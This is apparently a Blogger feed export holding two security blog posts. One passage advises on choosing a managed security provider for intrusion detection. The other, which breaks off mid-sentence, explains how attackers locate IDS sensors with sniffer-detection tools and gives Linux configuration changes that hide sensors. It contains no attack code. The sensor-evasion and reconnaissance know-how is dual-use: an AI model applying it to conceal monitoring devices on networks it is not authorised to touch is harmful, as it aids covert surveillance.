actual intrusions. MSSPs may consider a pilot phase to establish a base level of event activity that would be used for an initial fine-tuning of the system.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;System scalability. Even in a modest IDS initial deployment, the planning for future sensor deployment and integration should be considered from the start by the organization.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Technical training. If your MSSP provides basic monitoring and alerting, based on your service level agreement, technical training may be required for your organization’s analyst who is left with many tasks to support hardware and software components, signature updates and development, and basic sensor maintenance. &lt;/span&gt;&lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Reporting. There are two types of reporting that      an organization should consider:&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Alert reporting. There are some choices or requirements that may need to be implemented to comply with the organization’s policies: phone notification, e-mail notification, paging, SNMP trap and web portal notification. Timing of alert notification must certainly be considered and can be related to already developed incident handling policies and procedures.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Statistical and other reporting. Even when the managed security services provider is doing the analytical work and correlation, still as a conscious analyst in your organization, there are many benefits from knowing what type of events are being detected by the intrusion detection system to plan for better security measures. A secured web portal interface can aid the analyst on this task by providing statistical reporting while protecting the information being shared. &lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 5pt 108pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Incident handling reporting also may help the analyst in the effort to document the organization’s intrusion incidents and to justify future acquisition and implementation of security measures, in addition to the current MSSP expense. &lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 5pt 108pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Regular monthly reports are a good way to keep abreast with IDS upgrades and can provide security advisories for newly discovered threats.&lt;/span&gt;&lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Incident handling and forensics. Support may be      beyond monitoring and alerting. Data forensics is needed to understand the      event, the extent of any damage done, possible fixes and mitigation steps.      This aspect will depend on the organization’s incident and escalation      procedures for intrusion incidents. The organization may also need on-site      support in case of an intrusion incident and possible legal counseling and      support.&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Company’s assessment. &lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;On their own or with a partner. Various MSSPs provide the whole range of services or partner with another company to supplement the security services for the customers.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Corporate history and growth. Knowing how long the company has been established as a MSSP, number of employees, and growth over time may give the organization some prospective on what to expect, especially if the organization plans to expand services beyond the initial deployment. Also, having an idea of other corporate customers would provide some comfort level on the MSSPs background and capabilities to satisfy the organization’s needs.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Location and operations. Location may be a factor if your organization requires on-site support because travel expenses will be reflected in services’ cost. Inquire about SOC redundancy of operations since your organization will entrust a critical component of security to the MSSP.&lt;/span&gt; &lt;/p&gt;  &lt;p class="MsoNormal" style="margin-right: 36pt; margin-left: 72pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-size: 10pt; font-family: Symbol;"&gt;&lt;span style=""&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Personnel background. MSSPs take great pride in having on board former employees from the Department of Defense and other government agencies that specialize on intelligence work. Many analysts may also hold current certifications available for security professionals. In addition, it is wise to understand or require a certain level of background checks and/or clearances for analysts and staff that will be supporting your organization’s security efforts.&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Security services beyond IDS. To complement      intrusion detection system monitoring, MSSPs facilitate development of      security policies and procedures, as well as, a more proactive approach to      security measures to determine and correct vulnerabilities before an      intruder’s exploit. This proactive approach include vulnerability      assessment/scanning and penetration testing:&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;ul type="disc"&gt;&lt;ul type="circle"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Vulnerability       assessment/scanning. Assessing the strength and implementation of       security controls on systems and network can be performed with       vulnerability assessment tools. Some of these tools are active in nature       because they identify vulnerabilities using exploit techniques. &lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;  &lt;p style="margin: 5pt 108pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Other vulnerability assessment may be performed in a passive mode, where security weaknesses may be encountered by reviewing security measures developed and implemented by the organization such as security policies and procedures, access controls and, roles and responsibilities. Even when data needs to be gathered from production systems, the tests are performed off-line without affecting the systems’ performance. &lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 5pt 108pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Both types of vulnerability assessment approaches may assess important security controls such as password strength, file systems protection, system security-related bug-fixes and access control lists. &lt;/span&gt;&lt;/p&gt;  &lt;ul type="disc"&gt;&lt;ul type="circle"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Penetration testing to find       security holes before intruders do is always good practice. Your       organization may prefer to have the penetration testing performed by a       third party company. This will not only test for security weakness in       targeted systems but a test on the intrusion detection system       implementation as well.&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;  &lt;p style="margin: 5pt 108pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;The scope of any penetration testing and vulnerability assessments to be performed should be identified in advance to minimize impact to the systems and networks being tested.&lt;/span&gt;&lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Cost. This will greatly depend on the service      level agreement your organization develops with the selected MSSP. Service      level agreements range from simple sensor monitoring and alerting to sensor      implementation design and deployment, incidence forensics, vulnerability      assessments, penetration testing and others indicated in this document. &lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 5pt 72pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Consider the number and type of sensors to be deployed and monitored and, the extent of the initial targeted IDS implementation. There could be a significant difference in the cost of host-based versus network-based sensors and how extensive the support requested from the MSSP to maintain the IDS.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 5pt 72pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Also, MSSPs also provide hours of consulting services to satisfy other security needs from customers in an effort to provide comprehensive security services.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Some final thoughts&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;There is a wide range of outsourcing alternatives to implement an intrusion detection solution that fits your organization’s needs. Managed security services providers satisfy many requirements with specialization and solid expertise in the security field. &lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style="font-size: 10pt; font-family: Arial;"&gt;Selecting a managed security service provider may prove to require low initial investment and faster deployment than a solution developed and supported only with in-house resources because of the high cost of ownership.&lt;/span&gt;&lt;/p&gt;  &lt;span style="font-size: 10pt; font-family: Arial;"&gt;The organization needs to decide between technical and policy requirements, in addition to budget and technical constraints to find and acquire a provider best suited for the job at hand. Maybe the major challenge on acquiring MSSP is knowing what the organization wants and needs before the organization actually gets it.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-1715603319865567997?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/1715603319865567997/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=1715603319865567997' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/1715603319865567997'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/1715603319865567997'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/managed-security-services-ids-solution.html' title='Managed Security Services: an IDS solution'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-373113958723101675</id><published>2008-03-25T12:00:00.000-07:00</published><updated>2008-03-25T12:11:02.276-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Evading Passive Sniffer Detection With IDS Sensors</title><content type='html'>&lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;As Intrusion Detection (ID) technology has progressed, so too has it been increasingly considered a viable aspect of the "defense in depth" ideology. While ID may not necessarily be viewed as a definitively mature technology, there are certainly a multitude of options from which to choose. Each of the available Intrusion Detection Systems (IDS) offers a unique combination of capability, configuration options, and, of course, price.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;For the purpose of this discussion, the examples will apply directly to Shadow (the &lt;b&gt;S&lt;/b&gt;econdary &lt;b&gt;H&lt;/b&gt;euristic &lt;b&gt;A&lt;/b&gt;nalysis for &lt;b&gt;D&lt;/b&gt;efensive &lt;b&gt;O&lt;/b&gt;nline &lt;b&gt;W&lt;/b&gt;arfare, distributed by the &lt;st1:place st="on"&gt;&lt;st1:placename st="on"&gt;Naval&lt;/st1:placename&gt; &lt;st1:placename st="on"&gt;Surface&lt;/st1:placename&gt; &lt;st1:placename st="on"&gt;Warfare&lt;/st1:placename&gt;  &lt;st1:placetype st="on"&gt;Center&lt;/st1:placetype&gt;&lt;/st1:place&gt; and available from &lt;a href="http://www.nswc.navy.mil/ISSEC/CID/"&gt;http://www.nswc.navy.mil/ISSEC/CID/&lt;/a&gt;) running in the Linux environment. &lt;i&gt;Network Intrusion Detection: An Analyst’s Handbook, 2&lt;sup&gt;nd&lt;/sup&gt; Ed.&lt;/i&gt;, cites Snort (&lt;a href="http://www.snort.org/"&gt;http://www.snort.org&lt;/a&gt;) by Martin Roesch as having "outstripped Shadow just since December 1999" (Northcutt, &lt;i&gt;et al.&lt;/i&gt; 190); however, as Shadow is tcpdump-based the concepts are fundamentally easier to illustrate.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;So Where Is The Problem?&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Quite simply, Intrusion Detection Systems make for fairly strategic targets when their presence is discovered during network reconnaissance. One article, published in The Institute of Electrical and Electronics Engineers (IEEE) Software Magazine, actually asserts that "[s]mart intruders who realize that an IDS has been deployed on a network they are attacking will likely attack the IDS first, disabling it or forcing it to provide false information (distracting security personnel from the actual attack in progress)." (Allen, &lt;i&gt;et al.&lt;/i&gt; 47)&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;And why shouldn’t they? After all, an IDS sensor holds great potential for the assailant who can subvert it. In addition to allowing an outsider the ability to manipulate or censor log files to conceal his or her own presence, I would assert that the sensor contains a repository of packet capture data that likely offers a wealth of information about network topologies, user accounts, and passwords.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Further, once the sensor is captured, the attacker has free and clear access to a passive packet capture device without having to arouse any unnecessary suspicion; a network scan that reveals your IDS sensor in promiscuous mode is hardly noteworthy. Similarly, there is no need for the attacker to sanitize /var/log/messages because entries that show the adapter changing into and out of promiscuous mode appear equally innocuous.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;What Can I Do To Prevent This?&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Perhaps the best approach to reducing this threat is to first make a cursory examination of the tool set used to identify an IDS sensor. An understanding of a tool’s principle of operation is key in determining how to defend against it.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;For instance, the Neped (NEtwork Promiscuous Ethernet Detector) utility, distributed ca. 1998 by the Apostols group and included in several older revisions of the Trinux toolkit (&lt;a href="http://www.trinux.org/"&gt;http://www.trinux.org&lt;/a&gt;; NOTE: more recent versions have replaced Neped with the more diverse Sentinel utility available at &lt;a href="http://www.packetfactory.net/Projects/Sentinel"&gt;http://www.packetfactory.net/Projects/Sentinel&lt;/a&gt;), exploited a flaw in the manner in which some older (specifically 2.0.x and 2.1.x) Linux kernels responded to ARP requests. When in promiscuous mode, a box would reply to an ARP request regardless of the intended recipient. If one were to include this relatively compact (205 line) utility as part of a rootkit to be uploaded to a compromised site, Shadow in its infancy (remember, this was 1998) would likely have been running on one such affected kernel and thus the locations of the sensors would be immediately evident to an attacker.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;So how would this have been combated? The easiest manner in which to avoid such detection would have been to first append the /etc/sysconfig/network-scripts/ifcfg-eth0 to include a line similar to:&lt;/span&gt;&lt;/p&gt;  &lt;pre&gt;&lt;span style="font-size:12;"&gt;NOARP=yes&lt;span style=""&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span style=""&gt;   &lt;/span&gt;&lt;/pre&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Then, edit the /etc/sysconfig/network-scripts/ifup script to include a branch similar to:&lt;/span&gt;&lt;/p&gt;  &lt;pre&gt;&lt;span style="font-size:12;"&gt;if [ -n “$NOARP” ]; then&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;&lt;span style=""&gt;               &lt;/span&gt;ifconfig ${DEVICE} -arp&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;fi&lt;/span&gt;&lt;/pre&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;NB that the name of variable is fairly inconsequential &lt;u&gt;so long as it does not conflict with any of the predefined variables accounted for in the network configuration script&lt;/u&gt;, as is its value; it is simply a mechanism by which the branch is activated. Once activated, this branch disables ARP resolution entirely on the sensor, thus evading Neped detection.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Unfortunately, since the days of Neped there have been many advances in passive sniffer detection. Tools such as bind’s Sentinel (cited earlier) or AntiSniff (&lt;a href="http://www.securitysoftwaretech.com/antisniff/"&gt;http://www.securitysoftwaretech.com/antisniff/&lt;/a&gt;) developed by LØpht Heavy Industries use a battery of tests to discern the existence of packet capture devices on the network. AntiSniff 2.0, currently under development, will run on Win9x (consequently, sensor detection can be performed &lt;u&gt;without&lt;/u&gt; a permissions structure from any accessible console), WinNT/2000, and *NIX (command line versions may be run remotely on a compromised system). Additionally, this revision "is being designed to work not only on local network segments but also across routers and switches." (S.S.T., &lt;i&gt;Technical Details&lt;/i&gt; n. pag.)&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The "Technical Details" page for AntiSniff 1.x breaks out the tests into several categories. It first prods the Operating System for flaws in the handling of various packet types. Packets are created to address the Linux ARP flaw examined by Neped, a similar ARP flaw in NetBSD, and a broadcast Ethernet flaw in Win9x/NT. The next round of tests forges packets to provoke a reverse DNS lookup on fictitious addresses; the premise here (simplified, of course) is that if a machine is not in promiscuous mode then it will not process a packet with a destination IP not its own and thus there will be no DNS request if a sniffer is not present. The final round of tests benchmarks the network and specific boxes at a baseline level and under duress (&lt;i&gt;i.e.&lt;/i&gt;, during periods of substantial network traffic). Theoretically, a machine discarding all packets destined for IP addresses not its own at the link layer should not exhibit significantly different performance metrics during periods of forced network congestion, provided said congestion is not directly addressed to that box.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Several aspects of packet capture detection have been built into AntiSniff; however, not one is indefensible where IDS sensors are concerned. While the methodology employed by AntiSniff is by no means canonical (&lt;i&gt;i.e.&lt;/i&gt;, there are other, less effective methods of sniffer detection not incorporated into AntiSniff 1.x), similar defensive tactics would apply.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Going back to our original example of Shadow running on a Linux platform, the Neped discussion has already addressed the ARP test. While this is not applicable on all Linux or BSD kernels, a little preventative medicine never hurts.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The DNS issue may be dealt with similarly by altering the Shadow configuration as follows in /usr/local/logger/sensor/start_logger.pl:&lt;/span&gt;&lt;/p&gt;  &lt;pre&gt;&lt;span style="font-size:12;"&gt;# Prepare the parameters to pass to the tcpdump program.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;&lt;span style=""&gt;   &lt;/span&gt;$param =&lt;span style=""&gt;  &lt;/span&gt;“$PROGPAR -n -s 4096 -w - -F $FILTER”;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;&lt;span style=""&gt;   &lt;/span&gt;$param .= “ 2&gt;&gt;$LOGDIR/tcpdump.err | $GZIPPROG &gt; $TCPLOG4 2&gt;/dev/null”;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;#&lt;/span&gt;&lt;/pre&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The addition of the ‘–n’ parameter disables DNS resolution while the logs are being collected. An alternate solution would be deleting the /etc/resolv.conf file thereby disabling DNS resolution altogether. Once the logs have been transferred, either to the analyzer or an intermediate "safe" host, DNS information can be added into the logs on an "as needed" basis without altering the original by:&lt;/span&gt;&lt;/p&gt;  &lt;pre&gt;&lt;span style="font-size:12;"&gt;tcpdump –a –r tcp.2001030101 &gt; tcp.2001030101.dns&lt;/span&gt;&lt;/pre&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Dealing With Latency Tests&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The latency test is perhaps the most effective in the AntiSniff arsenal; no addressable production system will escape this test. The significant qualifier here is "addressable." The AntiSniff "Goals and Purpose" statement is pretty clear that "[i]f a machine on the network has no IP address, no IP stack associated with any of its interfaces, or has no ability to be communicated with over the network then AntiSniff will not detect it. This is perfectly acceptable, as such a machine would not be compromised over a network in the first place." (S.S.T., &lt;i&gt;Purpose&lt;/i&gt; n. pag.)&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The beauty of a non-addressable IDS sensor is that it provides a virtually undetectable monitoring capability (the "virtually" caveat is included for various reasons, not the least of which is that anyone having physical access to the infrastructure may notice the "extra" box that displays the promiscuity status of an adapter on the console once an hour). A scan of the IP range will not give up the location of the sensor, and its existence is equally difficult to discern with passive sniffer detection utilities.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;This configuration will require, first and foremost, that a second Ethernet adapter be installed in the sensor. The key here is that this second adapter is not to have an IP address bound to it. Unfortunately, most modern Linux distributions have a very well-meaning feature that brings adapters lacking addresses down after boot; however, this is easily remedied.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The "quick and dirty" solution would be to add the following as the last line of the ‘start)’ section of /etc/rc.d/init.d/network:&lt;/span&gt;&lt;/p&gt;  &lt;pre&gt;&lt;span style="font-size:12;"&gt;ifconfig eth1 up&lt;span style=""&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span style=""&gt;   &lt;/span&gt;&lt;/pre&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The more elegant solution would be to modify the network scripts such that they allow for an adapter without an IP address. Linux does not create a configuration file for an address without an adapter, so:&lt;/span&gt;&lt;/p&gt;  &lt;pre&gt;&lt;span style="font-size:12;"&gt;cd /etc/sysconfig/network-scripts/&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;cp ifcfg-eth0 ifcfg-eth1&lt;/span&gt;&lt;span style=""&gt;     &lt;/span&gt;&lt;/pre&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Having done that, edit ifcfg-eth1 and remove the IPADDR, NETMASK, NETWORK, and BROADCAST entries. Edit the remaining entries such that DEVICE=eth1, ATBOOT=yes, and BOOTPROTO=none. Finally, append an entry to ifcfg-eth1 that is similar to:&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;NOIPADDR=yes&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Then, edit the /etc/sysconfig/network-scripts/ifup script to include a branch similar to:&lt;/span&gt;&lt;/p&gt;  &lt;pre&gt;&lt;span style="font-size:12;"&gt;if [ -n “$NOIPADDR” ]; then&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;&lt;span style=""&gt;               &lt;/span&gt;ifconfig ${DEVICE} up&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre&gt;&lt;span style="font-size:12;"&gt;fi&lt;/span&gt;&lt;/pre&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;As in the case of the ARP example, the exact variable name is unimportant so long as there is no duplication. The preferred placement of this branch is immediately before the ‘else’ statement to which "regular" adapters with pre-specified IP addresses fall through.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;It should be noted that this modification negates the impact of the ARP and DNS modifications, as neither applies when a machine is not addressable. In other words, this change supercedes the other solutions addressed previously. &lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;If the sensor is on an insecure hub (&lt;i&gt;e.g.&lt;/i&gt;, at the perimeter, in the DMZ, etc.) and your threat model includes only outside attacks, eth0 of this sensor can tie back into your internal network. If there is a considerable internal threat, it may be advisable to implement an isolated network for your sensors and analyzer that is non-routable from all internal and external subnets. As per usual, there is a trade-off here between usability/accessibility and security, to be determined by each individual circumstance.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;For The Truly Paranoid…&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;It is possible to take this to yet another level. Those of us that have worked with 10Base5 Ethernet (&lt;i&gt;i.e.&lt;/i&gt;, AUI or "thicknet") before may remember a method of trimming connector pins or cable conductors to create a "receive only" connection. &lt;u&gt;Be careful&lt;/u&gt;&lt;i&gt; &lt;/i&gt;with this; if installed incorrectly, a modified cable could result in a "transmit only" system that would prevent the collection of any data. Pins 3 and 10 of the AUI connector are responsible for establishing the transmit connection; if the connections are physically severed, it is electrically impossible for that connection to transmit data. It is worth mentioning here that with a set of complicated equations and some equally complex monitoring equipment it may be possible to determine that there is a "receive only" system operating on a network from its electrical characteristics; however, to my 